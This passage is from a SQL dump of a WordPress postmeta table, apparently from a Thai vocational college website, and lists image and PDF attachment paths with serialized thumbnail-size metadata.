(17567, 8110, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:450;s:4:\"file\";s:24:\"2019/12/Untitled-1-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Untitled-1-1-300x90.png\";s:5:\"width\";i:300;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-768x230.png\";s:5:\"width\";i:768;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-1-1-1024x307.png\";s:5:\"width\";i:1024;s:6:\"height\";i:307;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-400x120.png\";s:5:\"width\";i:400;s:6:\"height\";i:120;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17708, 8218, '_wp_attached_file', '2020/03/040363-01.pdf'),
(17716, 8221, '_wp_attached_file', '2020/03/040363-02.pdf'),
(17727, 8227, '_wp_attached_file', '2020/03/040363-03.pdf'),
(17736, 8231, '_edit_lock', '1583205879:14'),
(17737, 8232, '_wp_attached_file', '2020/03/040363-01.jpg'),
(17738, 8232, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/03/040363-01.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040363-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040363-01-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040363-01-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17739, 8231, '_edit_last', '14'),
(17742, 8231, '_hide_featured', NULL),
(17743, 8231, '_thumbnail_id', '8232'),
(17748, 8235, '_edit_lock', '1583206037:14'),
(17749, 8235, '_edit_last', '14'),
(17750, 8236, '_edit_lock', '1583206093:14'),
(17751, 8236, '_edit_last', '14'),
(17752, 8237, '_wp_attached_file', '2020/03/040363-02.jpg'),
(17753, 8237, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/03/040363-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040363-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040363-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"040363-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"040363-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040363-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17754, 8236, '_thumbnail_id', '8237'),
(17757, 8236, '_hide_featured', NULL),
(17762, 8241, '_edit_lock', '1583206202:14'),
(17763, 8242, '_wp_attached_file', '2020/03/040363-03.jpg'),
(17764, 8242, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/03/040363-03.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040363-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040363-03-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040363-03-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17765, 8241, '_edit_last', '14'),
(17766, 8241, '_thumbnail_id', '8242'),
(17769, 8241, '_hide_featured', NULL),
(17772, 8244, '_edit_lock', '1583206310:14'),
(17773, 8245, '_wp_attached_file', '2020/03/040363-04.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(17774, 8245, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2020/03/040363-04.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040363-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040363-04-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040363-04-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17775, 8244, '_edit_last', '14'),
(17776, 8244, '_thumbnail_id', '8245'),
(17779, 8244, '_hide_featured', NULL),
(17782, 8247, '_edit_lock', '1583206407:14'),
(17783, 8247, '_edit_last', '14'),
(17784, 8248, '_wp_attached_file', '2020/03/040363-05.jpg'),
(17785, 8248, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/03/040363-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040363-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040363-05-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"040363-05-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"040363-05-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040363-05-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17786, 8247, '_thumbnail_id', '8248'),
(17789, 8247, '_hide_featured', NULL),
(17792, 8250, '_edit_lock', '1583206489:14'),
(17793, 8250, '_edit_last', '14'),
(17794, 8251, '_wp_attached_file', '2020/03/040363-06.jpg'),
(17795, 8251, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/03/040363-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040363-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040363-06-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"040363-06-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"040363-06-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040363-06-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17796, 8250, '_thumbnail_id', '8251'),
(17799, 8250, '_hide_featured', NULL),
(17800, 8253, '_edit_lock', '1583206574:14'),
(17801, 8253, '_edit_last', '14'),
(17802, 8254, '_wp_attached_file', '2020/03/040363-07.jpg'),
(17803, 8254, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/03/040363-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040363-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040363-07-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"040363-07-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"040363-07-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040363-07-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17804, 8253, '_thumbnail_id', '8254'),
(17807, 8253, '_hide_featured', NULL),
(17810, 8256, '_edit_lock', '1583206645:14'),
(17811, 8256, '_edit_last', '14'),
(17812, 8257, '_wp_attached_file', '2020/03/040363-08.jpg'),
(17813, 8257, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/03/040363-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040363-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040363-08-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"040363-08-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"040363-08-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040363-08-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17814, 8256, '_thumbnail_id', '8257'),
(17817, 8256, '_hide_featured', NULL),
(17820, 8259, '_edit_lock', '1583206725:14'),
(17821, 8259, '_edit_last', '14'),
(17822, 8260, '_wp_attached_file', '2020/03/040363-09.jpg'),
(17823, 8260, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/03/040363-09.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"040363-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"040363-09-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"040363-09-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"040363-09-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"040363-09-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(17824, 8259, '_thumbnail_id', '8260'),
(17827, 8259, '_hide_featured', NULL),
(17830, 8262, '_edit_lock', '1583206836:14'),
(17831, 8262, '_edit_last', '14'),
(17834, 8262, '_hide_featured', NULL),
(18688, 8879, '_wp_attached_file', '2019/12/ศธ02-popup.png'),
(18689, 8879, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:300;s:4:\"file\";s:26:\"2019/12/ศธ02-popup.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"ศธ02-popup-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"ศธ02-popup-300x60.png\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"ศธ02-popup-768x154.png\";s:5:\"width\";i:768;s:6:\"height\";i:154;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"ศธ02-popup-1024x205.png\";s:5:\"width\";i:1024;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"ศธ02-popup-400x80.png\";s:5:\"width\";i:400;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(18690, 8881, '_edit_lock', '1583462440:14'),
(18691, 8881, '_edit_last', '14'),
(18692, 8882, '_wp_attached_file', '2020/03/ศธ02-นร.png'),
(18693, 8882, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:27:\"2020/03/ศธ02-นร.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"ศธ02-นร-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"ศธ02-นร-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"ศธ02-นร-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"ศธ02-นร-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"ศธ02-นร-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(18694, 8881, '_hide_featured', NULL),
(18901, 9057, '_wp_attached_file', '2019/12/เปิดรับสมัครรอบ-2.png'),
(18902, 9057, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:300;s:4:\"file\";s:59:\"2019/12/เปิดรับสมัครรอบ-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"เปิดรับสมัครรอบ-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"เปิดรับสมัครรอบ-2-300x60.png\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"เปิดรับสมัครรอบ-2-768x154.png\";s:5:\"width\";i:768;s:6:\"height\";i:154;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"เปิดรับสมัครรอบ-2-1024x205.png\";s:5:\"width\";i:1024;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"เปิดรับสมัครรอบ-2-400x80.png\";s:5:\"width\";i:400;s:6:\"height\";i:80;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(18996, 9123, '_wp_attached_file', '2019/12/ประกาศผู้ผ่านการคัดเลือก-2563-ปวช-01.png'),
(18997, 9123, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:5001;s:6:\"height\";i:1125;s:4:\"file\";s:102:\"2019/12/ประกาศผู้ผ่านการคัดเลือก-2563-ปวช-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:102:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวช-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:101:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวช-01-300x67.png\";s:5:\"width\";i:300;s:6:\"height\";i:67;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:102:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวช-01-768x173.png\";s:5:\"width\";i:768;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:103:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวช-01-1024x230.png\";s:5:\"width\";i:1024;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:101:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวช-01-400x90.png\";s:5:\"width\";i:400;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(18998, 9124, '_wp_attached_file', '2019/12/ประกาศผู้ผ่านการคัดเลือก-2563-ปวส-01.png'),
(18999, 9124, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:5001;s:6:\"height\";i:1125;s:4:\"file\";s:102:\"2019/12/ประกาศผู้ผ่านการคัดเลือก-2563-ปวส-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:102:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวส-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:101:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวส-01-300x67.png\";s:5:\"width\";i:300;s:6:\"height\";i:67;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:102:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวส-01-768x173.png\";s:5:\"width\";i:768;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:103:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวส-01-1024x230.png\";s:5:\"width\";i:1024;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:101:\"ประกาศผู้ผ่านการคัดเลือก-2563-ปวส-01-400x90.png\";s:5:\"width\";i:400;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(19034, 9158, '_wp_attached_file', '2019/12/วิธีการมอบตัว-ลงทะเบียนเรียนเป็นนักเรียน-นักศึกษาใหม่.png'),
(19035, 9158, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:300;s:4:\"file\";s:167:\"2019/12/วิธีการมอบตัว-ลงทะเบียนเรียนเป็นนักเรียน-นักศึกษาใหม่.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:167:\"วิธีการมอบตัว-ลงทะเบียนเรียนเป็นนักเรียน-นักศึกษาใหม่-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:166:\"วิธีการมอบตัว-ลงทะเบียนเรียนเป็นนักเรียน-นักศึกษาใหม่-300x60.png\";s:5:\"width\";i:300;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:167:\"วิธีการมอบตัว-ลงทะเบียนเรียนเป็นนักเรียน-นักศึกษาใหม่-768x154.png\";s:5:\"width\";i:768;s:6:\"height\";i:154;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:168:\"วิธีการมอบตัว-ลงทะเบียนเรียนเป็นนักเรียน-นักศึกษาใหม่-1024x205.png\";s:5:\"width\";i:1024;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:20